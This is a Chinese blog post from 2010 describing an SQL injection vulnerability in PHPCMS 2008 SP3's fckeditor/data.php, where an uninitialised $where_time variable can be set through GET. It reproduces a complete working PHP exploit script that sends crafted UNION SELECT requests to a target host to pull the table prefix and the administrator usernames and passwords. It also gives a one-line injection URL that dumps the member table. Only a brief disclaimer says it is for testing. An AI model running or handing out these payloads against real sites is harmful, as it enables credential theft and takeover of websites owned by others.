Phpcms2008 SP3 SQL注入漏洞

date 2010年07月27日 | category 学习笔记,工具收集| 坏人咖啡

大早上曹同学就给我发过来一个这东西,就看了一下和他讨论了一下,顺便就发出来了,以下代码分别来自曹同学博客和老君的博客

简单描述:
PHPCMS SP3版本,SQL注入,可远程利用,成功后获取网站管理员密码

详细描述:
PHPCMS 2008的sp3版本中的fckeditor/data.php文件中当action为get时,且当$hour未被赋值或赋值小于1,则$where_time变量未被赋值,可构造任意数据提交,从而形成SQL注入,进而获取管理员用户名和密码,从而获取网站控制权

问题文件:fckeditor/data.php

[php]

switch($action)
{
case ”:
if($data == ”) exit;
if(CHARSET != ‘utf-8’) $data = iconv(‘utf-8′, CHARSET, $data);
$db->query("INSERT INTO ".DB_PRE."editor_data SET userid=’$_userid’, editorid=’$editorid’, ip=’".IP."’, created_time=’".TIME."’, data=’$data’");
echo ‘ok’;
break;

case ‘get’:
$hour = intval($hour);
if($hour>1)
{
$hour_start = TIME – $hour*3600;
$hour_end = TIME – ($hour-1)*3600;
$where_time = " created_time>=$hour_start AND created_time<=$hour_end";
}
elseif($hour==1)
{
$hour_end = TIME – 3600;
$where_time = "created_time>=$hour_end";
}
$data = array();
$result = $db->query("SELECT created_time,id FROM ".DB_PRE."editor_data WHERE userid=$_userid AND editorid=’$editorid’ AND $where_time ORDER BY id DESC");//正常情况下$where_time未初始化,可以通过全局用get赋值
while($r = $db->fetch_array($result))
{
$r[‘created_time’] = date(‘Y-m-d H:i:s’, $r[‘created_time’]);
$data[] = $r;
}
$db->free_result($result);
echo json_encode($data);
break;

[/php]

利用EXP:
BY:老君

[php]
<?php

print_r(‘
——————————————————————————–
PhpCms2008 sp3 "fckeditor/data.php" SQL injection
Admin credentials disclosure exploit
BY oldjun(www.oldjun.com) from (www.t00ls.net)
——————————————————————————–
‘);

if ($argc<3) {
print_r(‘
——————————————————————————–
Usage: php ‘.$argv[0].’ host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php ‘.$argv[0].’ localhost /
——————————————————————————–
‘);
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),’80’);
if (!$ock) {
echo ‘No response from ‘.$host; die;
}
fputs($ock,$packet);
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";

//Need to modify!!!
$cookie="GkvhDogqvGusername=oldjun; GkvhDogqvGauth=UzEPAQ5XAFFTAlBQVlxTBVEEDlVUUAANUQQGDwZaXFRRWw%3D%3D; GkvhDogqvGcookietime=0";
$agent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)";
//Remember to modify!!!

if (($path[0]<>’/’) or ($path[strlen($path)-1]<>’/’))
{echo ‘Error… check the path!’; die;}

/*get $prefix*/
$packet ="GET ".$path."fckeditor/data.php?action=get&where_time=/**/union/**/select HTTP/1.1\r\n";
$packet.="User-Agent: ".$agent."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("in your SQL syntax",$html))
{
$temp=explode("From ",$html);
if(isset($temp[1])){$temp2=explode("product",$temp[1]);}
if($temp2[0])
$prefix=$temp2[0];
echo "[+]prefix -> ".$prefix."\r\n\r\n";
}else{
echo "Login first!Pls modify cookie and agent!";
die();
}
echo "[~]exploting now,plz waiting\r\n\r\n";

$packet ="GET ".$path."fckeditor/data.php?action=get&where_time=1=2%20union%20all%20select%201,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20groupid=1%23 HTTP/1.1\r\n";
$packet.="User-Agent: ".$agent."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi("created_time",$html)){
echo $packet."\r\n";
echo $html."\r\n";
die("Exploit failed…");
}else{
$pattern="/(\[.*?\])/si";
preg_match($pattern,$html,$pg);
$html=str_replace("\\r\\n","",$pg[1]);
//echo $html;
$result=json_decode($html);
$num=count($result);
echo "[+]Admin number -> ".$num."\r\n";
for($i=0;$i<$num;$i++){
echo "[+]No.".$i."(username|password) -> ".$result[$i]->{"id"}."\r\n";
}
echo "\r\nExploit succeeded…\r\n";
}
?>
[/php]

请注册登录后再执行EXP。

不喜欢使用EXP的同学可以试试曹同学的这个代码:
注册个会员,然后执行

[php]
fckeditor/data.php?action=get&editorid=1&hour=-1&where_time=1>0%20union%20select%201,concat(username,0x3a,password)%20from%20phpcms_member/*
[/php]

本文只做测试研究用,请勿用于其它用途

所属分类: 学习笔记,工具收集
Tags: , , ,


没有评论

暂无评论

RSS feed for comments on this post.

对不起,该文章的评论被关闭了!